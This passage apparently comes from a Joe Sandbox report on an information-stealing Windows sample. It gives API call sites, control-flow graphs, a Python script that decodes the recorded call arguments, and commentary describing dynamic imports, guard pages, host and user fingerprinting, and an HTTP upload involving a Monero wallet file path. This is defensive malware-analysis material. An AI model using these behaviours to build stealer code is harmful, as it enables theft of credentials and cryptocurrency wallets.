                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                                • Instruction ID: 4e3a645a52866a17abbc2a059fb9e18d62f8982cd02c3ee98246574011ed054a
                                • Opcode Fuzzy Hash: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                                • Instruction Fuzzy Hash: 01A10AB55042409FD3C8EFA8ED99A5E3BF9F7C8301714451AA61D832A4DE39A8C1DB53

                                 Control-flow Graph (basic blocks with their call sites and successor blocks)

                                 • 764: 9345c0-934695 RtlAllocateHeap -> 781
                                 • 781: 9346a0-9346a6 -> 782, 783
                                 • 782: 93474f-9347a9 VirtualProtect
                                 • 783: 9346ac-93474a -> 781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0093460E
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0093479C
                                Strings
                                 • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30, in address order): 009345C7, 009345D2, 009345DD, 009345E8, 009345F3, 00934617, 00934622, 0093462D, 00934638, 00934643, 00934657, 00934662, 0093466D, 00934678, 00934683, 009346AC, 009346B7, 009346C2, 009346CD, 009346D8, 00934713, 0093471E, 00934729, 00934734, 0093473F, 0093474F, 0093475A, 00934765, 00934770, 0093477B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                 • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence repeated 30 times, once per xref listed above, joined with "$")
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 5cea6def1d68efaf62045111eacca6ccd3492b93c7fb45c137cd03cbeee3356b
                                • Instruction ID: a65070f6c72e54d76475ec6dea80746c26273720cd500ed69352cf13be8ed6f3
                                • Opcode Fuzzy Hash: 5cea6def1d68efaf62045111eacca6ccd3492b93c7fb45c137cd03cbeee3356b
                                • Instruction Fuzzy Hash: 364108607CB604EACE2CF7A7885FDDDBA567FC2F4AF51504BAC085A281CBB079844711

                                 Control-flow Graph (basic blocks with their call sites and successor blocks)

                                 • 801: 934880-934942 call 94a7a0 call 9347b0 call 94a740 * 5 InternetOpenA StrCmpCA -> 816, 817
                                 • 816: 934944 -> 817
                                 • 817: 93494b-93494f -> 818, 819
                                 • 818: 934955-934acd call 948b60 call 94a920 call 94a8a0 call 94a800 * 2 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a920 call 94a8a0 call 94a800 * 2 InternetConnectA -> 819, 905
                                 • 819: 934ecb-934ef3 InternetCloseHandle call 94aad0 call 939ac0 -> 829, 830
                                 • 829: 934f32-934fa2 call 948990 * 2 call 94a7a0 call 94a800 * 8
                                 • 830: 934ef5-934f2d call 94a820 call 94a9b0 call 94a8a0 call 94a800 -> 829
                                 • 905: 934ad3-934ad7 -> 906, 907
                                 • 906: 934ae5 -> 908
                                 • 907: 934ad9-934ae3 -> 908
                                 • 908: 934aef-934b22 HttpOpenRequestA -> 909, 910
                                 • 909: 934b28-934e28 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a9b0 call 94a8a0 call 94a800 call 94a920 call 94a8a0 call 94a800 call 94a740 call 94a920 * 2 call 94a8a0 call 94a800 * 2 call 94aad0 lstrlen call 94aad0 * 2 lstrlen call 94aad0 HttpSendRequestA -> 1021
                                 • 910: 934ebe-934ec5 InternetCloseHandle -> 819
                                 • 1021: 934e32-934e5c InternetReadFile -> 1022, 1023
                                 • 1022: 934e67-934eb9 InternetCloseHandle call 94a800 -> 910
                                 • 1023: 934e5e-934e65 -> 1022, 1024
                                 • 1024: 934e69-934ea7 call 94a9b0 call 94a8a0 call 94a800 -> 1021
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00934915
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 0093493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00934ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00950DDB,00000000,?,?,00000000,?,",00000000,?,015BFC60), ref: 00934DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00934E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00934E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00934E49
                                • InternetCloseHandle.WININET(00000000), ref: 00934EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00934EC5
                                • HttpOpenRequestA.WININET(00000000,015BFAC0,?,015BF098,00000000,00000000,00400100,00000000), ref: 00934B15
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • InternetCloseHandle.WININET(00000000), ref: 00934ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                                • Instruction ID: 242705127d79173be2e7755ded0450c764b67662c7be961f13c8b58c1683e81a
                                • Opcode Fuzzy Hash: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                                • Instruction Fuzzy Hash: E112EA72950118AAEB19EB90DCA2FEEB378FF94304F514199B10663191EF702F49CF66
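                                 The "APIs" listings above give the call-site arguments as raw hex and leave the reader to decode them. The following Python is an added example for this report, not Joe Sandbox's code and not the sample's: it parses lines in the `Name.DLL(args), ref: ADDR` shape (the input lines are copied from the VirtualProtect, GetProcAddress, WinINet, GetComputerNameA and GetUserNameA records above), decodes the constants a practitioner wants to see (VirtualProtect flNewProtect 0x100 as PAGE_GUARD, HttpOpenRequestA dwFlags 0x00400100 as INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, InternetConnectA dwService 3 as INTERNET_SERVICE_HTTP, InternetOpenA dwAccessType 1 as INTERNET_OPEN_TYPE_DIRECT), checks that the WinINet open/connect/request/send/read chain sits in ascending address order as one HTTP transaction, and lists the names resolved at run time through GetProcAddress. The constant tables are the Windows SDK values; the function and variable names are mine.

```python
"""Decode the 'Name.DLL(args), ref: ADDR' API lines of Joe Sandbox function records.
Added example, not part of the sandbox report or the sample. Input lines are copied
from the report; constant tables are Windows SDK values; function names are mine."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Union

# Copied from the "APIs" listings of the records above (sub-call lines left out).
REPORT_LINES = """
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00949BB6
• RtlAllocateHeap.NTDLL(00000000), ref: 0093460E
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0093479C
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00934915
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00934ABA
• HttpOpenRequestA.WININET(00000000,015BFAC0,?,015BF098,00000000,00000000,00400100,00000000), ref: 00934B15
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00934E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00934E49
• GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
• GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
"""

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Windows SDK constants for the parameters decoded below.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
                0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
INTERNET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                  0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                  0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
                  0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
                  0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
                  0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}

# (API, zero-based argument index) -> (parameter name, table, True if the value is a bit-flag set).
ARG_DECODERS = {("VirtualProtect", 2): ("flNewProtect", PAGE_PROTECT, True),
                ("HttpOpenRequestA", 6): ("dwFlags", INTERNET_FLAGS, True),
                ("InternetConnectA", 5): ("dwService", INTERNET_SERVICE, False),
                ("InternetOpenA", 1): ("dwAccessType", INTERNET_OPEN_TYPE, False)}

Arg = Union[int, str, None]   # hex value, symbolic name, or None for '?' (unresolved by the sandbox)


@dataclass
class Call:
    api: str
    dll: str
    ref: int                      # address of the call site
    args: List[Arg]
    decoded: Dict[str, List[str]] = field(default_factory=dict)


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def decode_value(value: int, table: Dict[int, str], flags: bool) -> List[str]:
    """Symbolic name(s) for a constant; unknown bits are kept as a hex remainder."""
    if not flags:
        return [table.get(value, f"0x{value:X}")]
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return names or ["0"]


def parse_report(text: str) -> List[Call]:
    """Parse every line of the expected shape (others are skipped), sorted by call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        call = Call(m["api"], m["dll"], int(m["ref"], 16), args)
        for (api, idx), (pname, table, flags) in ARG_DECODERS.items():
            if call.api == api and idx < len(args) and isinstance(args[idx], int):
                call.decoded[pname] = decode_value(args[idx], table, flags)
        calls.append(call)
    return sorted(calls, key=lambda c: c.ref)


WININET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile"]


def wininet_chain_in_order(calls: List[Call]) -> bool:
    """True when the whole open -> connect -> request -> send -> read chain is present and
    its first call sites ascend in address order, i.e. one straight-line HTTP transaction."""
    first: Dict[str, int] = {}
    for c in calls:                     # already address-sorted
        first.setdefault(c.api, c.ref)
    refs = [first.get(api) for api in WININET_CHAIN]
    return None not in refs and refs == sorted(refs)


def dynamic_imports(calls: List[Call]) -> List[str]:
    """Names resolved at run time through GetProcAddress (its second argument)."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) > 1 and isinstance(c.args[1], str)]


if __name__ == "__main__":
    parsed = parse_report(REPORT_LINES)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.dll} {c.decoded or ''}")
    print("WinINet chain in address order:", wininet_chain_in_order(parsed))
    print("Resolved at run time:", dynamic_imports(parsed))
```

                                 Two readings follow directly from the decoded values. The VirtualProtect call at 0093479C sets PAGE_GUARD on a 4-byte range right after RtlAllocateHeap, which is the behaviour behind the "guard pages" signature in the overview; the value is what the sandbox recorded at the call site, and a `?` argument means it could not resolve that value. The WinINet chain uses a direct (non-proxy) session, HTTP, keep-alive with Pragma: no-cache, then reads the response in 0x7CF (1999) byte chunks; together with the `"` and `------` strings in this record's String ID and the `\Monero\wallet.keys` path in its sub-call, that is consistent with a multipart form POST carrying collected files, which is how the Stealc detection in the overview would be expected to look at the API level. Resolving NtQueryInformationProcess by name through GetProcAddress rather than importing it is the dynamic-import pattern the "Extensive use of GetProcAddress" and debugger-check signatures refer to.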
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                                • Instruction ID: 141e3c857e02dfc20a55d0435e074817dd93af7d3a2f1a425a45ab724320d942
                                • Opcode Fuzzy Hash: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                                • Instruction Fuzzy Hash: 810181B1A04208EBC754DF99DD45FAEFBBCFB44B21F10425AFA45E3280D77459448BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                                • Instruction ID: d2e8a672d4b882b1481760b3cd24d3a066ae4faca9ef5b2f0a37785e7d6ae4c9
                                • Opcode Fuzzy Hash: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                                • Instruction Fuzzy Hash: 6FF04FB1944208AFC714DF98DD4AFAEFBB8EB44711F10065AFA05A3680C77819448BA2
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                                • Instruction ID: 0f90b748f216af56805f1b9ddcd8cc7a3a25760013c21e6096c1af7058fee9e7
                                • Opcode Fuzzy Hash: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                                • Instruction Fuzzy Hash: DAD05E7490430CDBCB04DFE0D8496DDBB78FB48312F000555D90963340EE3068C2CAA6

                                Control-flow Graph (basic blocks and edges recovered from the graph data; the rendered graph's executed/not-executed colouring is not reproduced)
                                Basic blocks:
                                • 633: 949c10-949c1a
                                • 634: 94a036-94a0ca LoadLibraryA * 8
                                • 635: 949c20-94a031 GetProcAddress * 43
                                • 636: 94a146-94a14d
                                • 637: 94a0cc-94a141 GetProcAddress * 5
                                • 638: 94a216-94a21d
                                • 639: 94a153-94a211 GetProcAddress * 8
                                • 640: 94a21f-94a293 GetProcAddress * 5
                                • 641: 94a298-94a29f
                                • 642: 94a2a5-94a332 GetProcAddress * 6
                                • 643: 94a337-94a33e
                                • 644: 94a344-94a41a GetProcAddress * 9
                                • 645: 94a41f-94a426
                                • 646: 94a4a2-94a4a9
                                • 647: 94a428-94a49d GetProcAddress * 5
                                • 648: 94a4dc-94a4e3
                                • 649: 94a4ab-94a4d7 GetProcAddress * 2
                                • 650: 94a515-94a51c
                                • 651: 94a4e5-94a510 GetProcAddress * 2
                                • 652: 94a612-94a619
                                • 653: 94a522-94a60d GetProcAddress * 10
                                • 654: 94a67d-94a684
                                • 655: 94a61b-94a678 GetProcAddress * 4
                                • 656: 94a686-94a699 GetProcAddress
                                • 657: 94a69e-94a6a5
                                • 658: 94a6a7-94a703 GetProcAddress * 4
                                • 659: 94a708-94a709
                                Edges: 633->634, 633->635, 634->636, 634->637, 635->634, 636->638, 636->639, 637->636, 638->640, 638->641, 639->638, 640->641, 641->642, 641->643, 642->643, 643->644, 643->645, 644->645, 645->646, 645->647, 646->648, 646->649, 647->646, 648->650, 648->651, 649->648, 650->652, 650->653, 651->650, 652->654, 652->655, 653->652, 654->656, 654->657, 655->654, 656->657, 657->658, 657->659, 658->659
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,015A5870), ref: 00949C2D
                                • GetProcAddress.KERNEL32(74DD0000,015A5730), ref: 00949C45
                                • GetProcAddress.KERNEL32(74DD0000,015B9670), ref: 00949C5E
                                • GetProcAddress.KERNEL32(74DD0000,015B9688), ref: 00949C76
                                • GetProcAddress.KERNEL32(74DD0000,015B96A0), ref: 00949C8E
                                • GetProcAddress.KERNEL32(74DD0000,015B96B8), ref: 00949CA7
                                • GetProcAddress.KERNEL32(74DD0000,015ABD88), ref: 00949CBF
                                • GetProcAddress.KERNEL32(74DD0000,015BE1B8), ref: 00949CD7
                                • GetProcAddress.KERNEL32(74DD0000,015BE050), ref: 00949CF0
                                • GetProcAddress.KERNEL32(74DD0000,015BE1E8), ref: 00949D08
                                • GetProcAddress.KERNEL32(74DD0000,015BE068), ref: 00949D20
                                • GetProcAddress.KERNEL32(74DD0000,015A5A70), ref: 00949D39
                                • GetProcAddress.KERNEL32(74DD0000,015A5750), ref: 00949D51
                                • GetProcAddress.KERNEL32(74DD0000,015A57D0), ref: 00949D69
                                • GetProcAddress.KERNEL32(74DD0000,015A58B0), ref: 00949D82
                                • GetProcAddress.KERNEL32(74DD0000,015BE110), ref: 00949D9A
                                • GetProcAddress.KERNEL32(74DD0000,015BE0B0), ref: 00949DB2
                                • GetProcAddress.KERNEL32(74DD0000,015ABB58), ref: 00949DCB
                                • GetProcAddress.KERNEL32(74DD0000,015A5970), ref: 00949DE3
                                • GetProcAddress.KERNEL32(74DD0000,015BE218), ref: 00949DFB
                                • GetProcAddress.KERNEL32(74DD0000,015BE230), ref: 00949E14
                                • GetProcAddress.KERNEL32(74DD0000,015BDF48), ref: 00949E2C
                                • GetProcAddress.KERNEL32(74DD0000,015BE0F8), ref: 00949E44
                                • GetProcAddress.KERNEL32(74DD0000,015A5990), ref: 00949E5D
                                • GetProcAddress.KERNEL32(74DD0000,015BE0E0), ref: 00949E75
                                • GetProcAddress.KERNEL32(74DD0000,015BE200), ref: 00949E8D
                                • GetProcAddress.KERNEL32(74DD0000,015BE098), ref: 00949EA6
                                • GetProcAddress.KERNEL32(74DD0000,015BE128), ref: 00949EBE
                                • GetProcAddress.KERNEL32(74DD0000,015BDFF0), ref: 00949ED6
                                • GetProcAddress.KERNEL32(74DD0000,015BE080), ref: 00949EEF
                                • GetProcAddress.KERNEL32(74DD0000,015BE0C8), ref: 00949F07
                                • GetProcAddress.KERNEL32(74DD0000,015BDFC0), ref: 00949F1F
                                • GetProcAddress.KERNEL32(74DD0000,015BE140), ref: 00949F38
                                • GetProcAddress.KERNEL32(74DD0000,015BA330), ref: 00949F50
                                • GetProcAddress.KERNEL32(74DD0000,015BE188), ref: 00949F68
                                • GetProcAddress.KERNEL32(74DD0000,015BDF90), ref: 00949F81
                                • GetProcAddress.KERNEL32(74DD0000,015A59D0), ref: 00949F99
                                • GetProcAddress.KERNEL32(74DD0000,015BE158), ref: 00949FB1
                                • GetProcAddress.KERNEL32(74DD0000,015A59F0), ref: 00949FCA
                                • GetProcAddress.KERNEL32(74DD0000,015BE038), ref: 00949FE2
                                • GetProcAddress.KERNEL32(74DD0000,015BDF60), ref: 00949FFA
                                • GetProcAddress.KERNEL32(74DD0000,015A5A10), ref: 0094A013
                                • GetProcAddress.KERNEL32(74DD0000,015A5C90), ref: 0094A02B
                                • LoadLibraryA.KERNEL32(015BDFA8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A03D
                                • LoadLibraryA.KERNEL32(015BDF78,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A04E
                                • LoadLibraryA.KERNEL32(015BE170,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A060
                                • LoadLibraryA.KERNEL32(015BE1A0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A072
                                • LoadLibraryA.KERNEL32(015BDFD8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A083
                                • LoadLibraryA.KERNEL32(015BE008,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A095
                                • LoadLibraryA.KERNEL32(015BE1D0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0A7
                                • LoadLibraryA.KERNEL32(015BE020,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0B8
                                • GetProcAddress.KERNEL32(75290000,015A5D30), ref: 0094A0DA
                                • GetProcAddress.KERNEL32(75290000,015BE500), ref: 0094A0F2
                                • GetProcAddress.KERNEL32(75290000,015B9028), ref: 0094A10A
                                • GetProcAddress.KERNEL32(75290000,015BE3F8), ref: 0094A123
                                • GetProcAddress.KERNEL32(75290000,015A5CB0), ref: 0094A13B
                                • GetProcAddress.KERNEL32(734C0000,015AB9C8), ref: 0094A160
                                • GetProcAddress.KERNEL32(734C0000,015A5CD0), ref: 0094A179
                                • GetProcAddress.KERNEL32(734C0000,015AB8B0), ref: 0094A191
                                • GetProcAddress.KERNEL32(734C0000,015BE3B0), ref: 0094A1A9
                                • GetProcAddress.KERNEL32(734C0000,015BE410), ref: 0094A1C2
                                • GetProcAddress.KERNEL32(734C0000,015A5CF0), ref: 0094A1DA
                                • GetProcAddress.KERNEL32(734C0000,015A5B90), ref: 0094A1F2
                                • GetProcAddress.KERNEL32(734C0000,015BE2F0), ref: 0094A20B
                                • GetProcAddress.KERNEL32(752C0000,015A5AB0), ref: 0094A22C
                                • GetProcAddress.KERNEL32(752C0000,015A5E10), ref: 0094A244
                                • GetProcAddress.KERNEL32(752C0000,015BE4E8), ref: 0094A25D
                                • GetProcAddress.KERNEL32(752C0000,015BE458), ref: 0094A275
                                • GetProcAddress.KERNEL32(752C0000,015A5BF0), ref: 0094A28D
                                • GetProcAddress.KERNEL32(74EC0000,015AB9F0), ref: 0094A2B3
                                • GetProcAddress.KERNEL32(74EC0000,015AB950), ref: 0094A2CB
                                • GetProcAddress.KERNEL32(74EC0000,015BE470), ref: 0094A2E3
                                • GetProcAddress.KERNEL32(74EC0000,015A5E30), ref: 0094A2FC
                                • GetProcAddress.KERNEL32(74EC0000,015A5D50), ref: 0094A314
                                • GetProcAddress.KERNEL32(74EC0000,015ABA68), ref: 0094A32C
                                • GetProcAddress.KERNEL32(75BD0000,015BE278), ref: 0094A352
                                • GetProcAddress.KERNEL32(75BD0000,015A5BB0), ref: 0094A36A
                                • GetProcAddress.KERNEL32(75BD0000,015B8F28), ref: 0094A382
                                • GetProcAddress.KERNEL32(75BD0000,015BE2A8), ref: 0094A39B
                                • GetProcAddress.KERNEL32(75BD0000,015BE530), ref: 0094A3B3
                                • GetProcAddress.KERNEL32(75BD0000,015A5C50), ref: 0094A3CB
                                • GetProcAddress.KERNEL32(75BD0000,015A5AD0), ref: 0094A3E4
                                • GetProcAddress.KERNEL32(75BD0000,015BE4B8), ref: 0094A3FC
                                • GetProcAddress.KERNEL32(75BD0000,015BE320), ref: 0094A414
                                • GetProcAddress.KERNEL32(75A70000,015A5B10), ref: 0094A436
                                • GetProcAddress.KERNEL32(75A70000,015BE290), ref: 0094A44E
                                • GetProcAddress.KERNEL32(75A70000,015BE4D0), ref: 0094A466
                                • GetProcAddress.KERNEL32(75A70000,015BE518), ref: 0094A47F
                                • GetProcAddress.KERNEL32(75A70000,015BE248), ref: 0094A497
                                • GetProcAddress.KERNEL32(75450000,015A5C70), ref: 0094A4B8
                                • GetProcAddress.KERNEL32(75450000,015A5AF0), ref: 0094A4D1
                                • GetProcAddress.KERNEL32(75DA0000,015A5D10), ref: 0094A4F2
                                • GetProcAddress.KERNEL32(75DA0000,015BE2D8), ref: 0094A50A
                                • GetProcAddress.KERNEL32(6F280000,015A5DB0), ref: 0094A530
                                • GetProcAddress.KERNEL32(6F280000,015A5D70), ref: 0094A548
                                • GetProcAddress.KERNEL32(6F280000,015A5E50), ref: 0094A560
                                • GetProcAddress.KERNEL32(6F280000,015BE4A0), ref: 0094A579
                                • GetProcAddress.KERNEL32(6F280000,015A5B30), ref: 0094A591
                                • GetProcAddress.KERNEL32(6F280000,015A5B50), ref: 0094A5A9
                                • GetProcAddress.KERNEL32(6F280000,015A5D90), ref: 0094A5C2
                                • GetProcAddress.KERNEL32(6F280000,015A5C10), ref: 0094A5DA
                                • GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 0094A5F1
                                • GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 0094A607
                                • GetProcAddress.KERNEL32(75AF0000,015BE308), ref: 0094A629
                                • GetProcAddress.KERNEL32(75AF0000,015B8F38), ref: 0094A641
